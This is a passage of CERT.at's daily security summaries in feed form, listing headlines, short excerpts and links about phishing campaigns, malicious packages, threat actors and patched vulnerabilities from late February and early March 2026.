&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/uk-warns-of-iranian-cyberattack-risks-amid-middle-east-conflict/&quot;&gt;https://www.bleepingcomputer.com/news/security/uk-warns-of-iranian-cyberattack-risks-amid-middle-east-conflict/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A fake FileZilla site hosts a malicious download&lt;/h3&gt;

A tampered copy of FileZilla quietly contacts attacker-controlled servers using encrypted DNS traffic that can slip past traditional monitoring.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/threat-intel/2026/03/a-fake-filezilla-site-hosts-a-malicious-download&quot;&gt;https://www.malwarebytes.com/blog/threat-intel/2026/03/a-fake-filezilla-site-hosts-a-malicious-download&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;FinanzOnline phishing: criminals threaten seizure of household goods&lt;/h3&gt;

Oh dear: a seizure of household goods is threatened because an outstanding amount has supposedly not been paid despite several reminders. That is exactly what an e-mail currently claims, purporting to come from FinanzOnline. In reality, however, it is not a genuine payment demand.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/finanzonline-phishing-hausratpfaendung/&quot;&gt;https://www.watchlist-internet.at/news/finanzonline-phishing-hausratpfaendung/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel&lt;/h3&gt;

A high-severity CVE-2026-0628 in Chrome's Gemini allowed local file access and privacy invasion. Google quickly patched the flaw.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/gemini-live-in-chrome-hijacking/&quot;&gt;https://unit42.paloaltonetworks.com/gemini-live-in-chrome-hijacking/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Active Reconnaissance Campaign Targets SonicWall Firewalls Through Commercial Proxy Infrastructure&lt;/h3&gt;

84,000+ scanning sessions targeting SonicWall SonicOS infrastructure in four days. GreyNoise details a coordinated reconnaissance campaign using rotating proxy infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/active-reconnaissance-campaign-targets-sonicwall-firewalls-through-commercial-proxy-infrastructure&quot;&gt;https://www.greynoise.io/blog/active-reconnaissance-campaign-targets-sonicwall-firewalls-through-commercial-proxy-infrastructure&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cultivating a robust and efficient quantum-safe HTTPS&lt;/h3&gt;

Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (&quot;PLANTS&quot;), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT).
&lt;p /&gt;
&lt;A HREF=&quot;https://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html&quot;&gt;https://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Stop Putting Secrets in .env Files&lt;/h3&gt;

[..] Why do we still store credentials in plaintext .env files?
&lt;p /&gt;
&lt;A HREF=&quot;https://jonmagic.com/posts/stop-putting-secrets-in-dotenv-files/&quot;&gt;https://jonmagic.com/posts/stop-putting-secrets-in-dotenv-files/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fooling Go's X.509 Certificate Verification&lt;/h3&gt;

Below are two X.509 certificates. The first is the Certificate Authority (CA) root certificate, and the second is a leaf certificate signed by the private key of the CA.
&lt;p /&gt;
&lt;A HREF=&quot;https://danielmangum.com/posts/fooling-go-x509-certificate-verification/&quot;&gt;https://danielmangum.com/posts/fooling-go-x509-certificate-verification/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Agents attacking agents: AI-powered bot exploiting GitHub Actions&lt;/h3&gt;

A week-long automated attack campaign targeted CI/CD pipelines across major open source repositories, achieving remote code execution in multiple targets. The attacker, an autonomous bot called hackerbot-claw, used 5 different exploitation techniques and successfully exfiltrated a GitHub token with write permissions from one of the most popular repositories on GitHub.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation&quot;&gt;https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Checkmk: high-risk cross-site scripting vulnerability in network monitoring software&lt;/h3&gt;

The developers have released updated Checkmk versions. They close a cross-site scripting vulnerability rated at least high risk.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Checkmk-Hochriskante-Cross-Site-Scripting-Luecke-in-Netzwerk-Monitor-Software-11194483.html&quot;&gt;https://www.heise.de/news/Checkmk-Hochriskante-Cross-Site-Scripting-Luecke-in-Netzwerk-Monitor-Software-11194483.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unauthorized AI Agent Execution Code Published to OpenVSX in Aqua Trivy VS Code Extension&lt;/h3&gt;

On February 27 and 28, 2026, versions 1.8.12 and 1.8.13 of the Aqua Trivy VS Code extension were published to the OpenVSX registry under the aquasecurityofficial.trivy-vulnerability-scanner namespace. Socket identified suspicious behavior in these versions shortly after publication and began investigating the releases.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/unauthorized-ai-agent-execution-code-published-to-openvsx-in-aqua-trivy-vs-code-extension&quot;&gt;https://socket.dev/blog/unauthorized-ai-agent-execution-code-published-to-openvsx-in-aqua-trivy-vs-code-extension&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Monday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1060911/&quot;&gt;https://lwn.net/Articles/1060911/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-03-02T19:26:53Z</dc:date></entry><entry><title>Tageszusammenfassung - 27.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-27022026"/><author><name>CERT.at</name></author><updated>2026-02-27T18:28:56Z</updated><published>2026-02-27T18:28:56Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 26-02-2026 18:00 - Friday 27-02-2026 18:00
Handler:     Wolfgang Menezes
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;New AirSnitch attack bypasses Wi-Fi encryption in homes, offices, and enterprises&lt;/h3&gt;

New research shows that behaviors that occur at the very lowest levels of the network stack make encryption (in any form, not just those that have been broken in the past) incapable of providing client isolation, an encryption-enabled protection promised by all router makers that is intended to block direct communication between two or more connected clients. The isolation can effectively be nullified through AirSnitch, the name the researchers gave to a series of attacks that capitalize on the newly discovered weaknesses.
&lt;p /&gt;
&lt;A HREF=&quot;https://arstechnica.com/security/2026/02/new-airsnitch-attack-breaks-wi-fi-encryption-in-homes-offices-and-enterprises/&quot;&gt;https://arstechnica.com/security/2026/02/new-airsnitch-attack-breaks-wi-fi-encryption-in-homes-offices-and-enterprises/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Log4j at its limit: AI junk paralyses open-source project&lt;/h3&gt;

According to the project, more and more AI-generated vulnerability reports are being submitted through its bug bounty program. [..] Karwasz proposes that Log4j vulnerability reports be triaged with short-term priorities in future and that, for now, only the important cases be processed.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/log4j-am-limit-ki-schrott-laehmt-open-source-projekt-2602-205903.html&quot;&gt;https://www.golem.de/news/log4j-am-limit-ki-schrott-laehmt-open-source-projekt-2602-205903.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Covert vehicle tracking: spying via the tyre pressure monitoring system&lt;/h3&gt;

Tyre pressure monitoring systems in modern vehicles give spies far-reaching surveillance capabilities, and have done so for many years. [..] According to the researchers, the point of attack is the radio signals emitted by the TPMS, which contain a unique identifier. [..] To track cars by their TPMS signals, the researchers say, only a simple radio receiver is needed, available for only around 100 US dollars. [..] &quot;Such information could reveal daily routines, such as working hours or travel habits,&quot; the research team warned.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/heimliches-fahrzeug-tracking-spionage-durch-das-reifendruckkontrollsystem-2602-205913.html&quot;&gt;https://www.golem.de/news/heimliches-fahrzeug-tracking-spionage-durch-das-reifendruckkontrollsystem-2602-205913.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Trojanized Gaming Tools Spread Java-Based RAT via Browser and Chat Platforms&lt;/h3&gt;

Threat actors are luring unsuspecting users into running trojanized gaming utilities that are distributed via browsers and chat platforms to distribute a remote access trojan (RAT). &quot;A malicious downloader staged a portable Java runtime and executed a malicious Java archive (JAR) file named jd-gui.jar,&quot; the Microsoft Threat Intelligence team said in a post on X.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/trojanized-gaming-tools-spread-java.html&quot;&gt;https://thehackernews.com/2026/02/trojanized-gaming-tools-spread-java.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Zoom and Google Meet scams install Teramind: A technical deep dive&lt;/h3&gt;

In this article, we'll provide the deeper technical analysis [..] On February 24, 2026, we published an article about how a fake Zoom meeting &quot;update&quot; silently installs monitoring software, documenting a campaign that used a convincing fake Zoom waiting room to push a legitimate Teramind installer abused for unauthorized surveillance onto Windows machines. [..] Despite the takedown, our continued monitoring shows the campaign is not only still active but growing: we have now identified a parallel operation impersonating Google Meet, running from a different domain and infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/threat-intel/2026/02/fake-zoom-and-google-meet-scams-install-teramind-a-technical-deep-dive&quot;&gt;https://www.malwarebytes.com/blog/threat-intel/2026/02/fake-zoom-and-google-meet-scams-install-teramind-a-technical-deep-dive&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hook, line, and vault: A technical deep dive into the 1Phish kit&lt;/h3&gt;

We analyze the evolution of the 1Phish phishing kit from a basic credential harvester into an MFA-aware, multi-stage phishing kit targeting 1Password users.
&lt;p /&gt;
&lt;A HREF=&quot;https://securitylabs.datadoghq.com/articles/hook-line-vault-a-deep-dive-into-1phish/&quot;&gt;https://securitylabs.datadoghq.com/articles/hook-line-vault-a-deep-dive-into-1phish/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious Go &quot;crypto&quot; Module Steals Passwords and Deploys Rekoobe Backdoor&lt;/h3&gt;

Socket's Threat Research Team uncovered a malicious Go module, github[.]com/xinfeisoft/crypto, that imitates the legitimate golang.org/x/crypto codebase but inserts a backdoor in ssh/terminal/terminal.go. That choice was strategic: golang.org/x/crypto is one of the Go ecosystem's foundational cryptography codebases, maintained by the Go project and widely relied on for primitives and packages such as bcrypt, argon2, chacha20, and ssh, which makes it a high-trust impersonation target in dependency graphs.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/malicious-go-crypto-module-steals-passwords-and-deploys-rekoobe-backdoor&quot;&gt;https://socket.dev/blog/malicious-go-crypto-module-steals-passwords-and-deploys-rekoobe-backdoor&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;GitLab Patch Release: 18.9.1, 18.8.5, 18.7.5&lt;/h3&gt;

These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version. GitLab Dedicated customers do not need to take action.
&lt;p /&gt;
&lt;A HREF=&quot;https://about.gitlab.com/releases/2026/02/25/patch-release-gitlab-18-9-1-released/&quot;&gt;https://about.gitlab.com/releases/2026/02/25/patch-release-gitlab-18-9-1-released/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN: Security updates for Friday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1060645/&quot;&gt;https://lwn.net/Articles/1060645/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-27T18:28:56Z</dc:date></entry><entry><title>Daily summary - 26.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-26022026"/><author><name>CERT.at</name></author><updated>2026-02-26T19:04:16Z</updated><published>2026-02-26T19:04:16Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 25-02-2026 18:00 - Thursday 26-02-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Fake Next.js job interview tests backdoor developers' devices&lt;/h3&gt;

The Microsoft Defender team has discovered a coordinated campaign targeting software developers through malicious repositories posing as legitimate Next.js projects and technical assessment materials, including recruiting coding tests.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/fake-nextjs-job-interview-tests-backdoor-developers-devices/&quot;&gt;https://www.bleepingcomputer.com/news/security/fake-nextjs-job-interview-tests-backdoor-developers-devices/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ransomware payment rate drops to record low as attacks surge&lt;/h3&gt;

The number of ransomware victims paying threat actors has dropped to 28% last year, an all-time low, despite a significant increase in the number of claimed attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/ransomware-payment-rate-drops-to-record-low-despite-attack-surge/&quot;&gt;https://www.bleepingcomputer.com/news/security/ransomware-payment-rate-drops-to-record-low-despite-attack-surge/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Data breach with OpenClaw: AI agent leaks internal data of a cybersecurity firm&lt;/h3&gt;

Once again, a data breach has occurred in connection with an AI agent. The operator apparently granted too many access rights.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/datenpanne-mit-openclaw-ki-agent-leakt-interne-daten-einer-cybersecurityfirma-2602-205873.html&quot;&gt;https://www.golem.de/news/datenpanne-mit-openclaw-ki-agent-leakt-interne-daten-einer-cybersecurityfirma-2602-205873.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Finding Signal in the Noise: Lessons Learned Running a Honeypot with AI Assistance [Guest Diary], (Tue, Feb 24th)&lt;/h3&gt;

Over the past several months, I have gained practical insight into the challenges of deploying and operating a honeypot, even within a relatively simple environment. This work highlighted how varying hardware, software, and network design can significantly alter outcomes. Through this process, I observed both the value and the limitations of log collection.
&lt;p /&gt;
&lt;A HREF=&quot;https://isc.sans.edu/diary/rss/32744&quot;&gt;https://isc.sans.edu/diary/rss/32744&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious StripeApi NuGet Package Mimicked Official Library and Stole API Tokens&lt;/h3&gt;

Cybersecurity researchers have disclosed details of a new malicious package discovered on the NuGet Gallery, impersonating a library from financial services firm Stripe in an attempt to target the financial sector. The package, codenamed StripeApi.Net, attempts to masquerade as Stripe.net, a legitimate library from Stripe that has over 75 million downloads.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/malicious-stripeapi-nuget-package.html&quot;&gt;https://thehackernews.com/2026/02/malicious-stripeapi-nuget-package.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UAT-10027 Targets U.S. Education and Healthcare with Dohdoor Backdoor&lt;/h3&gt;

A previously undocumented threat activity cluster has been attributed to an ongoing malicious campaign targeting education and healthcare sectors in the U.S. since at least December 2025. The campaign is being tracked by Cisco Talos under the moniker UAT-10027. The end goal of the attacks is to deliver a never-before-seen backdoor codenamed Dohdoor.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html&quot;&gt;https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;APT37 Adds New Capabilities for Air-Gapped Networks&lt;/h3&gt;

In December 2025, Zscaler ThreatLabz discovered a campaign linked to APT37 (also known as ScarCruft, Ruby Sleet, and Velvet Chollima), which is a DPRK-backed threat group. In this campaign, tracked as Ruby Jumper by ThreatLabz, APT37 uses Windows shortcut (LNK) files to initiate an attack that utilizes a set of newly discovered tools. These tools, RESTLEAF, SNAKEDROPPER, THUMBSBD, and VIRUSTASK, download a payload that delivers FOOTWINE and BLUELIGHT, which enable surveillance on a victim's system.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.zscaler.com/blogs/security-research/apt37-adds-new-capabilities-air-gapped-networks&quot;&gt;https://www.zscaler.com/blogs/security-research/apt37-adds-new-capabilities-air-gapped-networks&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Authenticator stops functioning when jailbreak/root access is detected&lt;/h3&gt;

Microsoft announces that the Authenticator app is to detect jailbreaks and root access. Entra accounts are then to be deleted.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Microsoft-Authenticator-bekommt-Jailbreak-und-Root-Erkennung-11190598.html&quot;&gt;https://www.heise.de/news/Microsoft-Authenticator-bekommt-Jailbreak-und-Root-Erkennung-11190598.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Apache ActiveMQ Exploit Leads to LockBit Ransomware&lt;/h3&gt;

This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
&lt;p /&gt;
&lt;A HREF=&quot;https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/&quot;&gt;https://thedfirreport.com/2026/02/23/apache-activemq-exploit-leads-to-lockbit-ransomware/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Identifying EWS apps and their usage before the EWS shutdown&lt;/h3&gt;

Microsoft is in the process of retiring Exchange Web Services (EWS). This process begins in October 2026 and ends with a complete shutdown of EWS in 2027.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/02/26/ews-apps-und-deren-nutzung-vor-der-ews-abschaltung-identifizieren/&quot;&gt;https://borncity.com/blog/2026/02/26/ews-apps-und-deren-nutzung-vor-der-ews-abschaltung-identifizieren/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Buy A Help Desk, Bundle A Remote Access Solution? (SolarWinds Web Help Desk Pre-Auth RCE Chain(s))&lt;/h3&gt;

It's been a while, but we're back - in time for story time. Gather round, strap in, and prepare for another depressing journey of &quot;all we wanted to do was reproduce an N-day, and here we are with 0-days&quot;.
&lt;p /&gt;
&lt;A HREF=&quot;https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/&quot;&gt;https://labs.watchtowr.com/buy-a-help-desk-bundle-a-remote-access-solution-solarwinds-web-help-desk-pre-auth-rce-chain-s/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Critical security vulnerabilities in Cisco Catalyst SD-WAN - actively exploited - updates available&lt;/h3&gt;

26 February 2026 Description: Cisco Catalyst SD-WAN contains multiple critical security vulnerabilities. The most severe vulnerability (CVE-2026-20127) allows an unauthenticated remote attacker to bypass authentication and gain administrative privileges on an affected system. Further vulnerabilities affect the Cisco Catalyst SD-WAN Manager and allow, among other things, authentication bypass, privilege escalation,
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/de/warnungen/2026/2/kritische-sicherheitslucken-in-cisco-catalyst-sd-wan-aktiv-ausgenutzt-updates-verfugbar&quot;&gt;https://www.cert.at/de/warnungen/2026/2/kritische-sicherheitslucken-in-cisco-catalyst-sd-wan-aktiv-ausgenutzt-updates-verfugbar&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical Juniper Networks PTX flaw allows full router takeover&lt;/h3&gt;

A critical vulnerability in the Junos OS Evolved network operating system running on PTX Series routers from Juniper Networks could allow an unauthenticated attacker to execute code remotely with root privileges.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Automation tool n8n: attackers can inject malicious code&lt;/h3&gt;

The automation tool n8n has eleven security vulnerabilities. Three of them are rated as critical risk. Admins should update promptly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Automatisierungs-Tool-n8n-Updates-stopfen-Codeschmuggel-Lecks-11190464.html&quot;&gt;https://www.heise.de/news/Automatisierungs-Tool-n8n-Updates-stopfen-Codeschmuggel-Lecks-11190464.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Thursday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1060391/&quot;&gt;https://lwn.net/Articles/1060391/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-26T19:04:16Z</dc:date></entry><entry><title>Daily summary - 25.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-25022026"/><author><name>CERT.at</name></author><updated>2026-02-25T19:43:02Z</updated><published>2026-02-25T19:43:02Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 24-02-2026 18:00 - Wednesday 25-02-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;1Campaign platform helps malicious Google ads evade detection&lt;/h3&gt;

A newly identified cybercrime service known as 1Campaign is enabling threat actors to run malicious Google Ads that remain online for extended periods while evading scrutiny from security researchers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/&quot;&gt;https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing campaign targets freight and logistics orgs in the US, Europe&lt;/h3&gt;

A financially motivated threat group dubbed &quot;Diesel Vortex&quot; is stealing credentials from freight and logistics operators in the U.S. and Europe in phishing attacks using 52 domains.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-freight-and-logistics-orgs-in-the-us-europe/&quot;&gt;https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-freight-and-logistics-orgs-in-the-us-europe/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;The OpenClaw Hype: Analysis of Chatter from Open-Source Deep and Dark Web&lt;/h3&gt;

OpenClaw has sparked heavy Telegram and dark web chatter, but Flare's data shows more research hype than mass exploitation. Flare explains how its telemetry found real supply-chain risk in the skills marketplace, yet limited signs of large-scale criminal operationalization.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/the-openclaw-hype-analysis-of-chatter-from-open-source-deep-and-dark-web/&quot;&gt;https://www.bleepingcomputer.com/news/security/the-openclaw-hype-analysis-of-chatter-from-open-source-deep-and-dark-web/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Marquis sues SonicWall over backup breach that led to ransomware attack&lt;/h3&gt;

Marquis Software Solutions has filed a lawsuit against SonicWall, accusing the cybersecurity company of gross negligence and misrepresentation that allegedly led to a ransomware attack disrupting operations at 74 U.S. banks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/marquis-sues-sonicwall-over-backup-breach-that-led-to-ransomware-attack/&quot;&gt;https://www.bleepingcomputer.com/news/security/marquis-sues-sonicwall-over-backup-breach-that-led-to-ransomware-attack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chinese cyberspies breached dozens of telecom firms, govt agencies&lt;/h3&gt;

Google's Threat Intelligence Group (GTIG), Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese threat actor that used SaaS API calls to hide malicious traffic in attacks targeting telecom and government networks.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/chinese-cyberspies-breached-dozens-of-telecom-firms-govt-agencies/&quot;&gt;https://www.bleepingcomputer.com/news/security/chinese-cyberspies-breached-dozens-of-telecom-firms-govt-agencies/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UAC-0050 Targets European Financial Institution With Spoofed Domain and RMS Malware&lt;/h3&gt;

A Russia-aligned threat actor has been observed targeting a European financial institution as part of a social engineering attack to likely facilitate intelligence gathering or financial theft, signaling a possible expansion of the threat actor's targeting beyond Ukraine and into entities supporting the war-torn nation.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/uac-0050-targets-european-financial.html&quot;&gt;https://thehackernews.com/2026/02/uac-0050-targets-european-financial.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RoguePilot Flaw in GitHub Codespaces Enabled Copilot to Leak GITHUB_TOKEN&lt;/h3&gt;

A vulnerability in GitHub Codespaces could have been exploited by bad actors to seize control of repositories by injecting malicious Copilot instructions in a GitHub issue. The artificial intelligence (AI)-driven vulnerability has been codenamed RoguePilot by Orca Security. It has since been patched by Microsoft following responsible disclosure.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/roguepilot-flaw-in-github-codespaces.html&quot;&gt;https://thehackernews.com/2026/02/roguepilot-flaw-in-github-codespaces.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious NuGet Packages Stole ASP.NET Data; npm Package Dropped Malware&lt;/h3&gt;

Cybersecurity researchers have discovered four malicious NuGet packages that are designed to target ASP.NET web application developers to steal sensitive data. The campaign, discovered by Socket, exfiltrates ASP.NET Identity data, including user accounts, role assignments, and permission mappings, and manipulates authorization rules to create persistent backdoors in victim applications.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/malicious-nuget-packages-stole-aspnet.html&quot;&gt;https://thehackernews.com/2026/02/malicious-nuget-packages-stole-aspnet.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Spyware can turn off the camera and microphone indicator on the iPhone&lt;/h3&gt;

Every iOS app should in fact make it visible that camera or microphone recording is running. Predator, a spyware program, hacks this, however.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Spyware-kann-Kamera-und-Mikrofonanzeige-beim-iPhone-abdrehen-11188076.html&quot;&gt;https://www.heise.de/news/Spyware-kann-Kamera-und-Mikrofonanzeige-beim-iPhone-abdrehen-11188076.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Best Western Hotels warns of phishing attacks&lt;/h3&gt;

Fraudsters apparently have access to current booking data of Best Western Hotels. The company warns of a wave of phishing.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Best-Western-Hotels-warnt-vor-Phishing-Attacken-11188923.html&quot;&gt;https://www.heise.de/news/Best-Western-Hotels-warnt-vor-Phishing-Attacken-11188923.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Your cloud storage is full?! What is really behind the warnings&lt;/h3&gt;

When dubious e-mails and persistent pop-up windows warn of full cloud storage, the utmost caution is advised. While in some cases real software vendors want to push a costly subscription onto people, behind other variants hide criminals who are after their victims' account data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/cloudspeicher-ist-voll/&quot;&gt;https://www.watchlist-internet.at/news/cloudspeicher-ist-voll/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing operation with links to Russia, Armenia compromised Western cargo companies, researchers find&lt;/h3&gt;

Over a five-month period, the group, dubbed Diesel Vortex, stole more than 1,600 login credentials from accounts at logistics platforms, which allowed thieves to intercept and divert freight shipments and commit check fraud.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/phishing-operation-russia-armenia-targeting-us-european-cargo&quot;&gt;https://therecord.media/phishing-operation-russia-armenia-targeting-us-european-cargo&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Caught in the Hook: RCE and API Token Exfiltration Through Claude Code Project Files | CVE-2025-59536 | CVE-2026-21852&lt;/h3&gt;

Check Point Research has discovered critical vulnerabilities in Anthropic's Claude Code that allow attackers to achieve remote code execution and steal API credentials through malicious project configurations. The vulnerabilities exploit various configuration mechanisms including Hooks, Model Context Protocol (MCP) servers, and environment variables - executing arbitrary shell commands and exfiltrating Anthropic API keys when users clone and open untrusted repositories.
&lt;p /&gt;
&lt;A HREF=&quot;https://research.checkpoint.com/2026/rce-and-api-token-exfiltration-through-claude-code-project-files-cve-2025-59536/&quot;&gt;https://research.checkpoint.com/2026/rce-and-api-token-exfiltration-through-claude-code-project-files-cve-2025-59536/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;2026 GreyNoise State of the Edge Report: Where Attacks Concentrate and Defenses Fall Short&lt;/h3&gt;

GreyNoise analyzed 2.97 billion malicious sessions over 162 days - and the patterns challenge assumptions about where edge defenses are strongest. From VPN targeting to infrastructure concentration to attackers rapidly rotating through fresh IPs, new research quantifies where the gaps are and what to do about it. Read the full findings.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/2026-greynoise-state-of-the-edge-report-where-attacks-concentrate-defenses-fall-short&quot;&gt;https://www.greynoise.io/blog/2026-greynoise-state-of-the-edge-report-where-attacks-concentrate-defenses-fall-short&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Unmasking Agent Tesla: A Deep Dive into a Multi-Stage Campaign&lt;/h3&gt;

